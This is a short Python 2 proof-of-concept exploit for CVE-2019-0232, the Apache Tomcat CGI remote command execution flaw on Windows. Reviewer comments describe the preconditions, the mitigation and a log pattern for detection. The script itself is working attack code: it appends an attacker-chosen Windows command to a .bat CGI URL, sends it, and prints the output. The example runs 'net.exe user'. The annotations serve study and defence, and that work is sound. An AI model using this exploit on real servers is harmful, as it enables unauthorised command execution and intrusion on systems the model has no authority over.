CVE-2019-0232.py
import requests
import sys
# Proof-of-concept request for CVE-2019-0232 (Apache Tomcat CGI servlet on
# Windows, per the banner below). This is a Python 2 script: the print
# statements are a SyntaxError under Python 3.
#
# What it does: reads a base URL (argv[1]) and a command name (argv[2]),
# appends them to a fixed CGI path and query prefix, sends a single GET
# request, and prints the response body.
#
# Defender notes:
#   - NOTE(review): exposure is understood to require the CGI servlet to be
#     enabled and its enableCmdLineArguments init-param set to true; confirm
#     against the vendor advisory. Where CGI is needed, turn that parameter
#     off or move to a fixed Tomcat release.
#   - Detection: the request built here targets a .bat CGI script with a
#     query string that starts with "&" followed by a percent-encoded
#     Windows path. That shape in access logs is worth alerting on.
#
# Example of the URL this script builds:
# http://localhost:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Cnet.exe+user

# Base URL of the server under test, e.g. http://localhost:8080.
# NOTE(review): argv is read before the usage line is printed, so running
# with a missing argument raises IndexError instead of showing usage.
url = sys.argv[1]
# Hard-coded CGI script path and query prefix; the prefix percent-decodes to
# "&C:\Windows\System32\". Assumes a script named hello.bat is mapped under
# /cgi-bin/ on the server.
url_dir = "/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5C"
# Second argument is appended to the query string as given.
cmd = sys.argv[2]
vuln_url = url + url_dir +cmd
print '''
_______ ________ ___ ___ __ ___ ___ ___ ____ ___
/ ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ / _ \__ \|___ \__ \
| | \ \ / /| |__ ______ ) | | | || | (_) |______| | | | ) | __) | ) |
| | \ \/ / | __|______/ /| | | || |\__, |______| | | |/ / |__ < / /
| |____ \ / | |____ / /_| |_| || | / / | |_| / /_ ___) / /_
\_____| \/ |______| |____|\___/ |_| /_/ \___/____|____/____|
Apache Tomcat Remote Code Execution on Windows - CGI-BIN
By Jas502n
'''
print "Usage: python CVE-2019-0232.py url cmd"
print "The Vuln url:\n\n" ,vuln_url
# Single GET with requests' defaults. No timeout is passed, so the call can
# block indefinitely if the server never responds.
r = requests.get(vuln_url)
# r.content is the raw response body. The HTTP status code is not checked,
# so an error page is printed the same way as a successful response.
print "\nThe Vuln Response Content: \n\n" , r.content